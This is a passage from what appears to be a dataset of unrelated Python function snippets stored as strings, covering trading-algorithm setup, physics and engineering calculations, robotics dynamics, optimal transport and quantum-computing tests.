and drops in the time series.\n #4.) Reverse the absolute value transformation with the exagerated peaks and drops. \n #5.) Normalize and correlate. \n#**********************************************************************\n \n context.slope_lookback=20#Number of minutes used when determining sudden price change. \n context.perChange = .07 #Percent change over length of 1/3(context.slope_lookback) that would indicate a sudden price change (This is the percent change that trades will be made on) **May be best adjusted based on volatility***\n context.numTradeCombo=5 #Number of most correlated combinations we wish to keep.\n #TODO: lookback may be best adjusted daily, to account for long term change in ideal lookback time.\n context.timerList=[] #List of times of when to make a trade (unit in minutes from present)\n context.tradeList=[] #List of securities to trade \n context.actionList=[] #List of actions (buy = 1 default (no action) = 0 sell = -1)\n context.tradingNow=[] #List of whether or not a security pair is currently trading (abrupt change already detected (yes = 1 or no = 0)\n context.tempCash=0\n \n context.baseThresh=0 #Percent change used as a threshold for determining the time of the base of a spike. Also used to verify the presence of an occuring spike on the lag stock prior to purchase \n context.fallThresh=-.0001 #Rate at which fall has to occur before an end of spike has been indicated (Usually 0)\n \n #Sell all securities at the end of each trading day (5 minutes before close of market)\n schedule_function(sellAll, date_rules.every_day(), time_rules.market_close(minutes=15))\n #Coordinate trades every minute. in the given range (minTime). Note that half days will not be traded and that the end of the range is 370 minutes after market open (369 - ie 21 minutes prior to market close)\n \n endDay=185 #Time to stop correlating and start trading (lets half a trading days worth of correlation be included)\n startTrade=endDay+2\n endTrade=370\n \n for minTime in range(startTrade,endTrade,1):\n \tschedule_function(coordTrade, date_rules.every_day(), time_rules.market_open(minutes = minTime), half_days=False)\n schedule_function(getIdealSec, date_rules.every_day(), time_rules.market_open(minutes = endDay))\n set_commission(commission.PerShare(cost=0.0, min_trade_cost=0.0))", "def F_trans(self):\n common_scale = self.edp_par['common_scale'].value\n R_HM = self.edp_par['R_HM'].value\n X_h = self.edp_par['X_h'].value\n psi = self.edp_par['psi'].value \n arg = self.qz*X_h*np.cos(psi) - self.qx*X_h*np.sin(psi)\n return common_scale * (R_HM*np.cos(arg) - 1)", "def calc_Cinv_CCGT(CC_size_W, CCGT_cost_data):\n\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if CC_size_W < CCGT_cost_data['cap_min'][0]:\n CC_size_W = CCGT_cost_data['cap_min'][0]\n CCGT_cost_data = CCGT_cost_data[\n (CCGT_cost_data['cap_min'] <= CC_size_W) & (CCGT_cost_data['cap_max'] > CC_size_W)]\n\n\n #costs of connection\n connection_costs = ngas.calc_Cinv_gas(CC_size_W)\n\n Inv_a = CCGT_cost_data.iloc[0]['a']\n Inv_b = CCGT_cost_data.iloc[0]['b']\n Inv_c = CCGT_cost_data.iloc[0]['c']\n Inv_d = CCGT_cost_data.iloc[0]['d']\n Inv_e = CCGT_cost_data.iloc[0]['e']\n Inv_IR = CCGT_cost_data.iloc[0]['IR_%']\n Inv_LT = CCGT_cost_data.iloc[0]['LT_yr']\n Inv_OM = CCGT_cost_data.iloc[0]['O&M_%'] / 100\n\n InvC = Inv_a + Inv_b * (CC_size_W) ** Inv_c + (Inv_d + Inv_e * CC_size_W) * log(CC_size_W)\n\n Capex_a_CCGT_USD = calc_capex_annualized((InvC+connection_costs), Inv_IR, Inv_LT)\n Opex_fixed_CCGT_USD = InvC * Inv_OM\n Capex_CCGT_USD = InvC\n\n return Capex_a_CCGT_USD, Opex_fixed_CCGT_USD, Capex_CCGT_USD", "def _calc_C(self, lambdify=True):\n\n C = None\n C_func = None\n # check to see if we have our term saved in file\n C, C_func = self._load_from_file('C', lambdify)\n\n if C is None and C_func is None:\n # if no saved file was loaded, generate function\n print('Generating centrifugal and Coriolis compensation function')\n\n # first get the inertia matrix\n M = self._calc_M(lambdify=False)\n\n # C_{kj} = sum_i c_{ijk}(q) \\dot{q}_i\n # c_{ijk} = 1/2 * sum_i (\\frac{\\partial M_{kj}}{\\partial q_j} +\n # \\frac{\\partial M_{ki}}{\\partial q_j} - \\frac{\\partial M_{ij}}\n # {\\partial q_k})\n C = sp.zeros(self.N_JOINTS, self.N_JOINTS)\n for kk in range(self.N_JOINTS):\n for jj in range(self.N_JOINTS):\n for ii in range(self.N_JOINTS):\n dMkjdqi = M[kk, jj].diff(self.q[ii])\n dMkidqj = M[kk, ii].diff(self.q[jj])\n dMijdqk = M[ii, jj].diff(self.q[kk])\n C[kk, jj] += .5 * (dMkjdqi + dMkidqj - dMijdqk) * self.dq[ii]\n C[kk, jj] = C[kk, jj]\n C = sp.Matrix(C)\n\n # save to file\n abr_control.utils.os_utils.makedirs(\n '%s/C' % self.config_folder)\n cloudpickle.dump(C, open(\n '%s/C/C' % self.config_folder, 'wb'))\n\n if lambdify is False:\n # if should return expression not function\n return C\n\n if C_func is None:\n C_func = self._generate_and_save_function(\n filename='C', expression=C,\n parameters=self.q+self.dq)\n return C_func", "def test_cfu(self):\n DATA = [\n # byte add\n ((0, 0, 0), 0),\n ((0, 0x01020304, 0x01020304), 20),\n ((0, 0x01010101, 0xffffffff), 1024),\n # byte swap\n ((1, 0x01020304, 0xffffffff), 0x04030201),\n ((1, 0x0102ff00, 0xffffffff), 0x00ff0201),\n # bit swap\n ((2, 0x01020304, 0xffffffff), 0x20c04080),\n ((2, 0xffffffff, 0xffffffff), 0xffffffff),\n ((2, 0x10203040, 0xffffffff), 0x020c0408),\n # Factorial\n ((3, 1, 0), 1),\n ((3, 2, 0), 2),\n ((3, 3, 0), 6),\n ((3, 4, 0), 24),\n ]\n\n def process():\n for n, (inputs, expected_output) in enumerate(DATA):\n func, i0, i1 = inputs\n yield self.dut.cmd_function_id.eq(func)\n yield self.dut.cmd_in0.eq(i0)\n yield self.dut.cmd_in1.eq(i1)\n yield self.dut.cmd_valid.eq(1)\n yield self.dut.rsp_ready.eq(0)\n yield\n yield self.dut.cmd_valid.eq(0)\n yield self.dut.rsp_ready.eq(1)\n yield Delay(0.1)\n assert (yield from self.wait_response_valid()), (\n \"op{func}({i0:08X}, {i1:08X}) failed to complete\")\n actual_output = (yield self.dut.rsp_out)\n assert actual_output == expected_output, (\n f\"\\nHEX: op{func}(0x{i0:08X}, 0x{i1:08X}) expected: {expected_output:08X} got: {actual_output:08X}\" +\n f\"\\nDEC: op{func}(0x{i0}, 0x{i1}) expected: {expected_output} got: {actual_output}\")\n yield\n self.run_sim(process, True)", "def __init__(self, f, N_elements, C, D, analytical, grid_points):\n\n\n\n self.Ne = N_elements\n self.gp = grid_points\n self.C = C\n self.D = D\n self.f = lambda x: f(x)\n self.tol = 10e-4\n self.x = sym.Symbol(\"x\")\n\n self.h = 1/(2*self.Ne)\n self.global_matrix = np.zeros([2*self.Ne, 2*self.Ne])\n self.global_vector = np.zeros([2*self.Ne])\n self.psi = sym.zeros(3*self.Ne,1)\n\n self.analytical = lambda x,C,D: analytical(x,C,D)\n\n self.x_values = np.linspace(0,1,self.gp)", "def fc(self, x = np.zeros(4) , u = np.zeros(3) , t = 0 ):\n \n dx = np.zeros(self.n) # State derivative vector\n \n [ q , dq ] = self.x2q( x ) # from state vector (x) to angle and speeds (q,dq)\n \n ddq = self.ddq_a( q , dq , u[0:self.dof] , u[self.dof] , t )\n \n dx = self.q2x( dq , ddq ) # from angle and speeds diff (dq,ddq) to state vector diff (dx)\n \n return dx", "def fc(self, x = np.zeros(4) , u = np.zeros(3) , t = 0 ):\n \n dx = np.zeros(self.n) # State derivative vector\n \n [ q , dq ] = self.x2q( x ) # from state vector (x) to angle and speeds (q,dq)\n \n ddq = self.ddq_a( q , dq , u[0:self.dof] , u[self.dof] , t )\n \n dx = self.q2x( dq , ddq ) # from angle and speeds diff (dq,ddq) to state vector diff (dx)\n \n return dx", "def _fv(self):\n return self.beta * (self.x ** self.c)", "def fc(self, x = np.zeros(2) , u = np.array([0,1]) , t = 0 ):\n \n dx = np.zeros(self.n) # State derivative vector\n \n q = x[0]\n dq = x[1]\n \n ddq = self.ddq_a( q , dq , u[0] , u[1] ) # Include hybrid input\n \n dx[0] = dq\n dx[1] = ddq\n \n return dx", "def __call__ (self, x) :\n fx = fixed_q_exp (x)\n result = fx (self)\n return result", "def fwd_model(Ti_samples,To_samples, dw_samples, kw_samples,hi_samples,ho_samples,TA_samples):\n\t#Determine number of samples (totquat)\n\ttotquat=len(Ti_samples)\n\t# List to store values of Q (assuming no radiative heat transfer) calculated from\n\t# the random samples of the parameters\n\tQ_samples_4PCE=[]\n\t# List to store values of Q assuming radiative heat transfer occurs\n\t#Q_r_samples_4PCE=[]\n\t# Calculate values of heat flux Q (assuming no radiative heat transfer)\n\t# for the different sample values and append to the list\n\tfor i in range(totquat):\n\t\t(Q,T1,T2)=compute_heat_flux(Ti_samples[i], To_samples[i], dw_samples[i],\\\n\t\t\tkw_samples[i], hi_samples[i], ho_samples[i])\n\t\tQ_samples_4PCE.append(Q)\n\t\t# Calculate values of heat flux Q assuming radiative heat transfer to atmosphere and append to list\n\t\t# For the required estimates of Q,T1, and T2 needed to solve the nonlinear system,\n\t\t# we use the values obtained by solving the system assuming no radiative heat transfer\n\t\t\"\"\"Q2=r_heat_flux(Ti_samples[i], To_samples[i], dw_samples[i], kw_samples[i],\\\n\t\t\thi_samples[i], ho_samples[i], TA_samples[i], (Q,T1,T2))\n\t\tQ_r_samples_4PCE.append(Q2)\n\t# Convert Q_r_samples_4PCE to numpy array\n\tQ_evals = np.array(Q_r_samples_4PCE)\n\treturn Q_evals\"\"\"\n\t\tConvert Q_samples_4PCE to numpy array\n\t\tQ_evals = np.array(Q_samples_4PCE)\n\t\treturn Q_evals\"\"\"\n\n\ndef KDE(fcn_evals):\n\t\"\"\"\n\tPerforms kernel density estimation\n\tInput:\n\t\tfcn_evals: numpy array of evaluations of the forward model (values of heat flux Q)\n\tOutput:\n\t\txpts_pce: numpy array of points at which the PDF is estimated.\n\t\tPDF_data_pce: numpy array of estimated PDF values.\n\t\"\"\"\n\t# Perform KDE on fcn_evals\n\tkern_pce=stats.kde.gaussian_kde(fcn_evals)\n\t# Generate points at which to evaluate the PDF\n\txpts_pce=np.linspace(fcn_evals.min(),fcn_evals.max(),200)\n\t# Evaluate the estimated PDF at these points\n\tPDF_data_pce=kern_pce(xpts_pce)\n\treturn xpts_pce, PDF_data_pce", "def __init__(self, base=None, mvtype=None, fct=False, blade_rep=False):\n\n def make_scalar(self, base): # make a scalar (grade 0)\n if isinstance(base, str):\n if self.fct:\n self.obj = Function(base)(*MV.coords) * MV.ONE\n else:\n self.obj = make_coef(self, base) * MV.ONE\n else:\n self.obj = base * MV.ONE\n self.igrade = 0\n self.blade_rep = True\n return self\n\n def make_vector(self, base): # make a vector (grade 1)\n if isinstance(base, str):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=1, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[1]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=1, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=1, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[1]))))\n else:\n result = S.Zero\n for (coef, base) in zip(base, MV.blades[1]):\n result += coef * base\n self.obj = result\n self.igrade = 1\n self.blade_rep = True\n return self\n\n def make_basisvector(self, base):\n raise NotImplementedError(\"Don't know how to compute basis vectors of class %\" % self.__class__)\n\n def make_basisbivector(self, base):\n raise NotImplementedError(\"Don't know how to compute basis bivectors of class %\" % self.__class__)\n\n def make_grade(self, base): # if base is 'A,n' then make a grade n multivector\n if isinstance(base, str):\n base_lst = base.split(',')\n base = base_lst[0]\n n = int(base_lst[1])\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=n, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[n]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=n, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=n, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[n]))))\n else:\n raise TypeError('Cannot make_grade for base = %s' % base)\n self.igrade = n\n self.blade_rep = True\n return self\n\n def make_grade2(self, base): # grade 2 multivector\n if isinstance(base, str):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=2, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[2]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=2, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=2, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[2]))))\n else:\n raise TypeError('!!!!Cannot make_grade2 for base = ' + str(base) + '!!!!\\n')\n self.igrade = 2\n self.blade_rep = True\n return self\n\n def make_pseudo(self, base): # multivector of grade MV.dim\n if isinstance(base, str):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=MV.dim, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[MV.dim]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=MV.dim, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=MV.dim, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[MV.dim]))))\n else:\n raise TypeError('!!!!Cannot make_pseudo for base = ' + str(base) + '!!!!\\n')\n self.igrade = MV.dim\n self.blade_rep = True\n return self\n\n def make_spinor(self, base): # multivector with all even grades\n if isinstance(base, str):\n if self.fct:\n self.obj = Function(base)(*MV.coords) * MV.ONE\n else:\n self.obj = Symbol(base) * MV.ONE\n for rank in range(2, MV.dim1, 2):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=rank, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj += reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[rank]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=rank, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=rank, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj += reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[rank]))))\n else:\n raise TypeError('Cannot make_mv for base = %s' % base)\n self.igrade = -1\n self.blade_rep = True\n return self\n\n def make_mv(self, base):\n if isinstance(base, str):\n if self.fct:\n self.obj = Function(base)(*MV.coords) * MV.ONE\n else:\n self.obj = Symbol(base) * MV.ONE\n for rank in range(1, MV.dim1):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=rank, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj += reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[rank]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=rank, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=rank, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj += reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[rank]))))\n else:\n raise TypeError('!!!!Cannot make_mv for base = ' + str(base) + '!!!!\\n')\n self.igrade = -1\n self.blade_rep = True\n return self\n\n MVtypes = {'scalar': make_scalar,\n 'vector': make_vector,\n 'basisvector': make_basisvector,\n 'basisbivector': make_basisbivector,\n 'grade': make_grade,\n 'grade2': make_grade2,\n 'bivector': make_grade2,\n 'pseudo': make_pseudo,\n 'spinor': make_spinor,\n 'mv': make_mv}\n\n self.fct = fct\n self.is_base = False\n self.is_grad = False\n self.print_blades = MV.print_blades\n self.fmt = 1\n\n if mvtype is None:\n if base in (None, S.Zero): # Default is zero multivector\n self.blade_rep = True\n self.obj = S.Zero\n self.igrade = 0\n elif isinstance(base, str): # Base or blade basis multivector\n self.is_base = True\n if '*' in base:\n self.blade_rep = False\n self.igrade = -1\n else:\n if '^' in base:\n self.blade_rep = True\n self.igrade = base.count('^') + 1\n else:\n self.blade_rep = blade_rep\n self.igrade = 1\n self.obj = Symbol(base, commutative=False)\n elif isinstance(base, MV): # Copy constructor\n self.blade_rep = base.blade_rep\n self.obj = base.obj\n self.igrade = base.igrade\n self.fct = base.fct\n self.is_base = base.is_base\n self.is_grad = base.is_grad\n elif isinstance(base, (Expr, Symbol)): # Gets properties of multivector from Expr\n if base.is_commutative:\n self.obj = base * MV.ONE\n self.blade_rep = True\n self.igrade = 0\n else:\n if isinstance(base, (Add, Mul)): # Complex expression\n MV.characterize_expression(self, base)\n elif isinstance(base, Symbol):\n if not base.is_commutative:\n if base == MV.ONE:\n self.obj = base\n self.blade_rep = True\n self.igrade = 0\n elif base in MV.blades_flat: # basis blade\n self.obj = base\n self.blade_rep = True\n self.igrade = MV.blade_grades[base]\n elif base in MV.bases_flat: # basis base\n self.obj = base\n self.blade_rep = False\n self.igrade = -1\n else:\n raise ValueError('MV(' + str(base) + ') is not allowed in constructor\\n' +\n 'non-commutative argument is not a base\\n')\n else: # scalar sympy symbol\n self.obj = base * MV.ONE\n self.igrade = 0\n self.blade_rep = True\n elif isinstance(base, Number):\n self.obj = base * MV.ONE\n self.igrade = 0\n self.blade_rep = True\n else: # Preconfigured multivector types\n MVtypes[mvtype](self, base)", "def test_implantation_flux_with_time_dependancy():\n flux = sp.Piecewise((1, festim.t < 10), (0, True))\n imp_depth = 5e-9\n width = 5e-9\n distribution = (\n 1\n / (width * (2 * np.pi) ** 0.5)\n * sp.exp(-0.5 * ((festim.x - imp_depth) / width) ** 2)\n )\n expected_value = sp.printing.ccode(flux * distribution)\n\n my_source = festim.ImplantationFlux(flux=flux, imp_depth=5e-9, width=5e-9, volume=1)\n\n assert my_source.value._cppcode == expected_value", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H1 + sigma_H1\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def calculateElementCoefficients(self):\n #\n #get u,grad(u), and grad(u)Xgrad(w) at the quadrature points\n #\n for cj in range(self.nc):\n self.u[cj].getValues(self.q[('v',cj)],\n self.q[('u',cj)])\n if self.q.has_key(('grad(u)',cj)):\n self.u[cj].getGradientValues(self.q[('grad(v)',cj)],\n self.q[('grad(u)',cj)])\n #\n #get functions of (t,x,u) at the quadrature points\n #\n self.coefficients.evaluate(self.timeIntegration.t,self.q)\n log(\"Coefficients on element\",level=10,data=self.q)\n #\n # time integration is handled directly in ELLAM weak approximation, don't have a hook for\n # doing that via a time integration object (could if it were a direct Lagrange Galerkin formulation I believe)\n # however, need to set time integration's m_tmp if use that anywhere\n #if self.timeTerm:\n # self.timeIntegration.calculateElementCoefficients(self.q)\n\n #todo eventually can add nonlinear potential here\n\n #cek and mwf need to go through this section to clean up, some of next two blocks could go to calcQuad\n #\n #todo need non-diagonal dependence?\n for ci in range(self.nc):\n cfemIntegrals.calculateCFLADR(self.elementEffectiveDiametersArray,\n self.q[('dm',ci,ci)],\n self.q[('df',ci,ci)],#could just be velocity\n self.q[('cfl',ci)])", "def __call__(self, frame_num):\n quant_sys = self.quant_sys\n quant_sys.propagate(10)\n\n # propagate the wigner function\n self.img_clasical_rho.set_array(\n (quant_sys.D22 + quant_sys.D11).real\n #quant_sys.get_classical_rho()\n )\n\n self.img_Upsilon2.set_array(\n quant_sys.quantum_rho.real\n )\n\n return self.img_clasical_rho, self.img_Upsilon2", "def proximal(self):\n functional = self\n\n class EntRegOptTransProximal(Operator):\n\n \"\"\"Proximal operator of entropy regularized optimal transport.\n\n The prox is given by::\n\n prox_[gamma*T_eps](mu1) = arg min_x (T_epsilon(mu0, x) +\n 1/(2*gamma) ||x - mu1||^2_2)\n \"\"\"\n\n def __init__(self, sigma):\n \"\"\"Initialize a new instance.\n\n Parameters\n ----------\n sigma : positive float\n \"\"\"\n self.sigma = float(sigma)\n super().__init__(domain=functional.domain,\n range=functional.domain, linear=False)\n\n # Setting up parameters\n self.const = 1 / (functional.epsilon * sigma)\n\n def _call(self, x):\n \"\"\"Apply the operator to ``x``.\"\"\"\n u = functional.tmp_u_prox\n v = functional.tmp_v_prox\n\n # Running generalized Sinkhorn iterations\n for j in range(functional.niter):\n # Safe-guarded u-update, to avoid divide-by-zero error.\n u_old = u.copy()\n tmp1 = functional.K_op(v)\n if np.min(tmp1) < 1e-30 or np.max(tmp1) > 1e+50:\n print('Numerical instability, truncation in Transport prox (Kv)',\n str(np.min(tmp1)), str(np.max(tmp1)))\n\n tmp = np.fmax(tmp1, 1e-30)\n\n\n u = functional.mu0 / tmp\n if np.min(u) < 1e-30 or np.max(u) > 1e+50:\n print('u (min/max)', str(np.min(u)), str(np.max(u)))\n\n # Safe-guarded v-update, to avoid divide-by-zero error.\n v_old = v.copy()\n\n tmp3 = functional.K_op_adjoint(u)\n if np.min(tmp3) < 1e-30 or np.max(tmp3) > 1e+50:\n print('Truncation in Transport prox (KTu)',\n str(np.min(tmp3)), str(np.max(tmp3)))\n print('u (min/max)', str(np.min(u)), str(np.max(u)))\n\n tmp4 = (self.const * tmp3 * np.exp(self.const * x))\n\n if np.min(tmp4) < 1e-30 or np.max(tmp4) > 1e+200:\n print('Argument in lambdert omega (min/max)',\n str(np.min(tmp4)), str(np.max(tmp4)))\n\n v = np.exp(self.const * x - lambertw_fulfix(tmp4))\n\n v1 = np.exp(self.const * x - scipy.special.lambertw(\n tmp4))\n if (v-v1).norm() > 1e-10:\n print('diff pga ny lambderw omega funciton',\n str((v-v1).norm()))\n print('v (min/max)', str(np.min(v)), str(np.max(v)))\n print('Argument in lambdert omega (min/max)',\n str(np.min(tmp4)), str(np.max(tmp4)))\n\n # If the updates in both u and v are small, break the loop\n if ((np.log(v)-np.log(v_old)).norm() < 1e-8 and\n (np.log(u)-np.log(u_old)).norm() < 1e-8):\n break\n\n # Store the u and v in the internal temporary variables of the\n # functional\n functional.tmp_u_prox = u\n functional.tmp_v_prox = v\n\n return x - self.sigma * functional.epsilon * np.log(v)\n\n return EntRegOptTransProximal", "def __init__(self, wavefunctions, dt=1., threshold=1e-3, **kwargs):\n\n wavefunctions = np.array(wavefunctions, copy=True)\n\n # normalize the wavefunction over the first axis (basis)\n wavefunctions /= linalg.norm(wavefunctions, axis=1)[:, np.newaxis]\n\n # calculate the alternating sequence of signs for iFFT autocorrelation function\n k = np.arange(wavefunctions.shape[0])\n minus = (-1) ** k[:, np.newaxis]\n\n # energy axis (as prescribed by Method 1 for calculating Fourier transform\n energy_range = (k - k.size / 2) * np.pi / (0.5 * dt * k.size)\n\n # the windowed fft of the wave function with respect to the time axis\n wavefunctions_fft_w = fftpack.ifft(\n minus * wavefunctions * blackman(k.size)[:, np.newaxis],\n axis=0,\n overwrite_x=True\n )\n wavefunctions_fft_w *= minus\n\n\n weight = linalg.norm(wavefunctions_fft_w, axis=1)\n weight /= weight.max()\n\n # extract peaks in weight to get the eigen energies\n peaks, _ = find_peaks(weight, height=threshold, **kwargs)\n #peaks = np.nonzero(weight > threshold)\n\n # the eigenvalues of the Hamiltonian\n energies = energy_range[peaks]\n\n self.weight = weight\n self.energy_range = energy_range\n\n \"\"\"\n #############################################################################################\n\n\n # normalize the auto correlation function\n auto_corr_fft_w /= auto_corr_fft_w.max()\n\n # extract peaks in the auto correlation function to get the eigen energies\n peaks, _ = find_peaks(auto_corr_fft_w, height=threshold, **kwargs)\n\n # the eigenvalues of the Hamiltonian\n energies = energy_range[peaks]\n\n #############################################################################################\n\n # calculate the alternating sequence of signs for iFFT wavefunction\n minus = (-1) ** k[:, np.newaxis]\n\n wavefunctions_fft_w = fftpack.ifft(\n minus * wavefunctions * blackman(k.size)[:, np.newaxis],\n axis=0,\n overwrite_x=True\n )\n wavefunctions_fft_w *= minus\n \"\"\"\n\n # extract the eigenfunctions of the unknown hamiltonian\n eigenvects = wavefunctions_fft_w[peaks]\n\n # normalize the eigenfunctions\n eigenvects /= linalg.norm(eigenvects, axis=1)[:, np.newaxis]\n\n # remove the numerical noise by orthogonalizing the extracted basis\n # This is a numerically stable version of the Gramm Schmidt\n eigenvects, _ = linalg.qr(eigenvects.T, mode='economic', overwrite_a=True)\n eigenvects = eigenvects.T\n\n # saving the results of recovering\n self.energies = energies\n self.eigenvects = eigenvects\n\n # save the initial condition\n self.init_wavefunc = wavefunctions[0].copy()", "def get_coupling(self, method='rdt'):\n if method == 'rdt':\n if \"F1001\" not in self._results_df or \"F1010\" not in self._results_df:\n self.calc_rdts(['F1001', 'F1010'])\n res_df = self._results_df.loc[:, ['S', 'F1001', 'F1010']]\n res_df.loc[:, \"F1001\"].real *= -1\n res_df.loc[:, \"F1010\"].real *= -1\n return res_df\n elif method == 'cmatrix':\n if \"F1001_C\" not in self._results_df:\n self.calc_cmatrix()\n res_df = self._results_df.loc[:, ['S', 'F1001_C', 'F1010_C']]\n return res_df.rename(columns=lambda x: x.replace(\"_C\", \"\"))\n else:\n raise ValueError(\"method '{:s}' not recognized.\".format(method))", "def setUp(self):\n self.cashFlowDate=Date(1,October,2018)\n self.fixingDate=Date(1,November,2018)\n self.foreignAmount=1000.0\n self.familyName=\"ECB\"\n self.fixingDays=2\n self.sourceCurrency=USDCurrency()\n self.targetCurrency=EURCurrency()\n self.fixingCalendar=UnitedStates()\n self.todayDate=Date(11, November, 2018)\n self.tsDayCounter=Actual360()\n self.flatForwardUSD=FlatForward(self.todayDate, 0.005, self.tsDayCounter)\n self.sourceYts=RelinkableYieldTermStructureHandle(self.flatForwardUSD)\n self.flatForwardEUR=FlatForward(self.todayDate, 0.03, self.tsDayCounter);\n self.targetYts=RelinkableYieldTermStructureHandle(self.flatForwardEUR)\n self.fxindex=FxIndex(self.familyName,self.fixingDays,self.sourceCurrency,self.targetCurrency,self.fixingCalendar,self.sourceYts,self.targetYts)\n self.fxlinkedcashflow=FXLinkedCashFlow(self.cashFlowDate,self.fixingDate,self.foreignAmount,self.fxindex)", "def test_integration(self):\n\n m = 5 # number of wires in A\n M = 2**m\n\n xmax = np.pi # bound to region [-pi, pi]\n xs = np.linspace(-xmax, xmax, M)\n\n probs = np.array([norm().pdf(x) for x in xs])\n probs /= np.sum(probs)\n\n func = lambda i: np.sin(xs[i]) ** 2\n r_rotations = np.array([2 * np.arcsin(np.sqrt(func(i))) for i in range(M)])\n\n A_wires = [0, \"a\", -1.1, -10, \"bbb\"]\n target_wire = \"Ancilla\"\n wires = A_wires + [target_wire]\n estimation_wires = [\"bob\", -3, 42, \"penny\", \"lane\"]\n\n def fn():\n qml.templates.MottonenStatePreparation(np.sqrt(probs), wires=A_wires)\n r_unitary(qml.RY, r_rotations, control_wires=A_wires[::-1], target_wire=target_wire)\n\n qmc_circuit = qml.quantum_monte_carlo(\n fn, wires=wires, target_wire=target_wire, estimation_wires=estimation_wires\n )\n\n with qml.queuing.AnnotatedQueue() as q:\n qmc_circuit()\n qml.probs(estimation_wires)\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape = tape.expand(depth=2)\n\n assert all(\n not isinstance(op, (qml.MultiControlledX, qml.templates.QFT, qml.tape.QuantumScript))\n for op in tape.operations\n )\n\n dev = qml.device(\"default.qubit\", wires=wires + estimation_wires)\n res = dev.execute(tape)\n\n @qml.qnode(dev)\n def circuit():\n qml.templates.QuantumMonteCarlo(\n probs, func, target_wires=wires, estimation_wires=estimation_wires\n )\n return qml.probs(estimation_wires)\n\n res_expected = circuit()\n assert np.allclose(res, res_expected)", "def C(self, q, dq):\n # check for function in dictionary\n if self._C is None:\n self._C = self._calc_C()\n parameters = tuple(q) + tuple(dq)\n return np.array(self._C(*parameters), dtype='float32')", "def test_MPI_QFT(self):\n shots = 100\n num_qubits = 10\n backend_options = self.BACKEND_OPTS.copy()\n for opt, val in self.MPI_OPTIONS.items():\n backend_options[opt] = val\n\n circuit = transpile(QFT(num_qubits),\n backend=self.SIMULATOR,\n optimization_level=0)\n circuit.measure_all()\n qobj = assemble(circuit, shots=shots, memory=True)\n result = self.SIMULATOR.run(qobj, **backend_options).result()\n\n counts = result.get_counts(circuit)\n #comparing counts with pre-computed counts\n self.assertEqual(counts, self.ref_counts_qft10)", "def tctfdfc(x):\n if isinstance(x,Fdf) :\n 